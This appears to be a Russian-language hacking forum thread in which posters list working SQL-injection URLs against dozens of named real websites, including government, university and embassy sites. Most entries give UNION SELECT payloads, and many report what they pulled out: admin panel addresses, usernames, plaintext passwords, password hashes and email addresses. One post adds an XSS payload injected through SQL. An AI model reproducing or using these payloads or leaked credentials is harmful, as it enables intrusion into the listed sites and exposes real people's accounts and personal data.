http://r2.com.au/news.php?page=6&id=-37+union+select+1,2,3,4,5/* ----------------------------------------------------------------------- http://www.recipeforhappiness.com.au/news.php?p=shw&id=-101+union+select+1,2,3,4,5,6,7,8+from+admin/* Колонки подобрать не получилось ----------------------------------------------------------------------- http://www.ecoaction.com.au/news.php?id=-40+union+select+1,2,3,concat(username,char(58),password),5,6+from+users/* admin:m3mph15 ----------------------------------------------------------------------- http://nsw.cchr.org.au/news.php?id=-62+union+select+table_name,2,3,4,5+from+information_schema.tables/* ----------------------------------------------------------------------- http://www.swiss.org.au/news.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* ----------------------------------------------------------------------- http://www.4id.com.au/news.php?action=show&news_id=-1+union+select+1,concat(username,char(58),password),3+from+users/* ----------------------------------------------------------------------- http://www.screenact.act.gov.au/news.php?action=index&id=-6+union+select+1/* ----------------------------------------------------------------------- http://www.applehomeloan.com.au/news.php?id=-73+union+select+1,2,3,4/* ----------------------------------------------------------------------- http://www.puo.pl/news.php?id=-40+union+select+1,2,3,4,5,6/*&backlink=/ ----------------------------------------------------------------------- http://www.proszowki-basen.pl/news.php?id=-186+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+1,100/* ----------------------------------------------------------------------- http://www.zieloni.org.pl/news.php?id=-3670+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+1,100/*&PHPSESSID=d541b457ccf042d5d0efd1c85a3234de ----------------------------------------------------------------------- http://www.ukraine-emb.pl/pl/news.php?id=-271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* ----------------------------------------------------------------------- http://www.azs.agh.edu.pl/news.php?id=-258+union+select+1,2,3,4,5,concat(name,char(58),password),7+from+users/* Админка: http://www.azs.agh.edu.pl/logon.php dosin:zadzior codzio:warkastrong sekretariat:rena21ta kip9:nuvedewiu8eevr Rino:rinoonir ----------------------------------------------------------------------- http://www.turystyka.org.pl/news.php?id=-60'+union+select+1,2,3,4,5,6,7,8,9/* ----------------------------------------------------------------------- http://www.am-strategies.com/en/news.php?ID=-149+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(char(58),login,password,email),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/* admin:test:[email protected] http://am-strategies.com/admin пароль не подходит ----------------------------------------------------------------------- http://www.bfexplode.de/en/news.php?id=-11+union+select+1,2,password,4+from+users/* Колонки не нашел(( ----------------------------------------------------------------------- http://audit.kharkov.com/en/news.php?id=-126+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/* Есть таблица phpbb_users ----------------------------------------------------------------------- http://www.focifum.com/en/news.php?list=0&ID=-7+union+select+1,2,3,4,5,6/* ----------------------------------------------------------------------- http://www.ekobus.cz/en/news.php?id=-1169768767+union+select+1,2,concat(user,char(58),pass),4+from+admin/*&lan=en bus:buPJAuU2.yYGM DES(UNIX) Админка: http://www.ekobus.cz/admin/ ----------------------------------------------------------------------- http://www.qanat.info/news.php?id=-98+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*&mode=en ----------------------------------------------------------------------- http://fph.tu.ac.th/en/news.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*&cate=1 ----------------------------------------------------------------------- http://www.audica.co.uk/en/news.php?id=-13+union+select+1,2,3,4,5+from+users/* ----------------------------------------------------------------------- http://www.le-temps-suspendu.com/revesdesagas/en/news.php?id=-37+union+select+1,2,version(),4/* ----------------------------------------------------------------------- http://www.xeltek.com.cn/en/news.php?id=-30+union+select+1,2,3,4,5,6/* P.S Сильно не ругайте))
http://www.abruzzoverdeblu.it/?id=-67+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* http://www.fuorissimo.it/php-bin/joke/users.php?ID=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11,12/* http://www.casoniatuttabirra.it/artista.php?id=-1+union+select+1,2,3,4,user(),6,7/*
http://www.tigella.it/news.php?ID=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* ----------------------------------------------------------------------- http://www.fondopriamo.it/news.php?id=-189+union+select+1,2,3,concat(user,char(58),password),5,6,7,8+from+mysql.user/* Пароль не отображается((
edinteractive.co.uk HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6/* USER:ediadmin@scary VERSION:5.0.45-community-log DATABASE:edi HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,column_name,4,5,6+from+information_schema.columns/* - названия всех колонок HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,table_name,4,5,6+from+information_schema.tables/* - названия всех таблиц Имя проекта CMC ) HTML: http://www.edinteractive.co.uk/article/?id=-48+union+select+0,1,2,concat(id,0x3a,project_name,0x3a,website_link),4,5,6+from+aei_portfolio/*
Code: http://www.naushko.ru/whisper.php?id=-3887+union+select+1,2,3,concat_ws(0x2F,userid,name,pass,email),5,6+from+users+limit+2,2/* Version 5.026 name/pass/mail Руслан/asdsdf/[email protected] Perfecto/prf/[email protected]
http://www.afa.org.tw/ HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9/* 4.1.20:afa@localhost:afa HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,admin_password,6,7,8,9+FROM+admin/* a65660c1c91cd0a717c1d3ebc7f66c68 (если кому-то надо, админка тут: http://www.afa.org.tw/admin/, а мыло: [email protected]) HTML: http://www.afa.org.tw/news_detail.php?news_id=-33+UNION+SELECT+1,2,3,4,concat_ws(0x3a,username,user_password,user_email),6,7,8,9+FROM+phpbb_users+LIMIT+1,1/* JChen:b51699d453f963ae42af5b37563e3ab2:[email protected] ... P.S. Кажись сайт китайский, а я удивлялся почему у них форум какой-то левый
http://www.studiolegalebartolini.it/news.php?id=-66+union+select+1,2,3,4,5,6/* ----------------------------------------------------------------------- http://www.ipmaroma2008.it/news.php?ID=-00017+union+select+1,2,3,4,5,6/* ----------------------------------------------------------------------- http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,table_name+from+information_schema.tables/*&r=25 Все таблицы http://www.kanzlei-tmfg.de/news.php?id=-10+union+select+1,2,column_name+from+information_schema.columns/*&r=25 Все колонки А дальше сами)) ----------------------------------------------------------------------- http://www.bppa.at/de/news.php?id=-18+union+select+1,2,3,4/* ----------------------------------------------------------------------- http://metfan.de/news.php?id=-258+union+select+1,2,3,4,5,6,7,8,9/*
2 Tigger Доводи инъекции до конца или хотя бы выводи version(), user(), database(). Не оставляй просто так, только подобрав поля. Смысла нет =\ 2 all =) HTML: http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&type_id=1 4.0.24:user12325072_1@superultra19. HTML: http://www.livingstonfc.co.uk/newsdet.php?news_id=-399+UNION+SELECT+1,2,concat_ws(0x3a,name,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+FROM+users/*&type_id=1 Not important:tractor http://www.zik.com.ua/ HTML: http://www.zik.com.ua/index.php?news_id=45555+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 4.1.22-log:zik@localhost:zik http://www.nisc.lt/ HTML: http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4,5/* 5.0.27-log:nisc@mysql50:nisc HTML: http://www.nisc.lt/lt/news.php?news_id=205+UNION+SELECT+1,2,convert(table_name+using+latin1),4,5+FROM+information_schema.tables/* 1: admin:fa2a336347b0da6f022232868d831c73: [email protected] 9: martinas:16f48b6a5ffdf2665c25dba0a58df350: [email protected] 10: olia:ade9fb3441b9794e97329a4adf2b4939: [email protected]
Code: http://www.teasetrip.com/tnews.php?op=tnews&id=-447+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11+from+users+limit+1,1/* Code: http://www.actupix.net/tnews.php?op=tnews&id=-56+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
http://vmashine.ru - В Машине.ру Настройки своей страницы -> Управление автомобилями -> Добавление автомобиля -> Самое первое поле <options> так вот все value у <select> не фильтруются....заменяем value у любого параметра каким-нибудь firebug'om на -1 или '+blabla , ну вообщем все как делаете обычно только пост запросами.... Еще можно узнать локальный путь через сессии....подрезав их (c) ettte
http://www.cultura.usb.ve/ Code: http://www.cultura.usb.ve/noticia.php?id=-1+union+select+1,2,3,convert(concat_ws(0x3a,user(),database(),version())+using+latin1),5,6,7,8,9,10,11/* http://www.davidluna.com.ve/ Code: http://www.davidluna.com.ve/index.php?ID=-1+union+select+1,2,concat_ws(0x3a,login,password),4,5,6+from+login/* http://www.forosocialmundial.org.ve/ Code: http://www.forosocialmundial.org.ve/noticia_mas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10/* http://www.tiburonesdelaguaira.com.ve/ Code: http://www.tiburonesdelaguaira.com.ve/mostrar_noticia.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/* http://www.vaspuntofijo.com.ve/ Code: http://www.vaspuntofijo.com.ve/repuestos.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())/* http://galeria.uc.edu.ve/ Code: http://galeria.uc.edu.ve/noticias.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3,4+from+mysql.user/* root:*822F83E1D728CFD3D28DC5D309DE95F0EAC258E9
turkystan.kz HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,USER(),VERSION(),DATABASE()/* USER:[email protected] VERSION:4.1.22 DATABASE:turkesdb HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,concat(ID,0x3a,login,0x3a,password),2,3+from+users/* Таблица - users Поля - id,login,password 1:admin:51a71aa84f5e79ad XSS через SQL) HTML: http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,'%3Cscript%3Ealert(/XSS/)%3C/script%3E',2,3+from+users/*
5.0.45-log но в базе ничо с пасами не нащёл ---------------------------------------------------------------------- www.travelhit.pl 5.0.45-community hermantravel:merLINxLasT но он никуда не подошёл есть : http://www.travelhit.pl/admin http://www.travelhit.pl/cpanel ---------------------------------------------------------------------- 5.0.45-community куча всякой дряни на их родном языке (( ---------------------------------------------------------------------- 5.0.45-community
Code: http://www.compasspoint.org/boardcafe/details.php?id=805+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database(),0x71),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* compasspoint@localhost:4.1.11-Debian_4sarge7-log:compasspointq Code: http://www.hornets247.com/post.php?id=37007+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5/* 4.0.27maxlog:hornets247_v4_0:[email protected] Code: http://skyscrapernews.com/buildings.php?id=223+order+by+229/* 229 столбцов)))
Code: http://www.hogwartsnet.ru/fanf/member.php?id=-1653+union+select+concat_ws(0x2F,version(),id,name,password),2,3,4,5,6,7,8,9+from+u45544_ipbd.ipbd_forums/* Version 5.0.46
http://team-rs.ru Code: http://team-rs.ru/member.php?id=-24+union+select+1,2,3,4,concat_ws(0x2F,id,login,password),6,version(),8,9,10+from+dtool_users/* Version : 5.0.45-log/[email protected]/u13952 login / password 30VC06T0 / 2A3TFH5A 4YYH6M58 / 5M42I233
http://voss.kyrkjer.net/ HTML: http://voss.kyrkjer.net/news.php?news_id=14'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13/* 4.0.20-standard:voss@localhost:voss http://www.antonwachterprijs.nl/ HTML: http://www.antonwachterprijs.nl/top1.php?news_id=-21'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8/* 4.1.22-community-nt:flyingbookmarks@localhost:awp
Какой то, самописный наверное, двиг. В админке есть возможность заливки файлов на сервер. Шеллы палит. csgn.org HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),8,9,10,11,12,13,14,15/* USER:[email protected] VERSION:5.0.19-nt DATABASE:csgn HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(id,0x3a,name,0x3a,password)+using+latin1),8,9,10,11,12,13,14,15+from+user/* HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(table_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.tables/* - названия всех таблиц HTML: http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(column_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.columns/* - названия всех колонок Таблица - user Поля - id,name,password 1:ahiggins:new123 - админ Раскрутил по полной
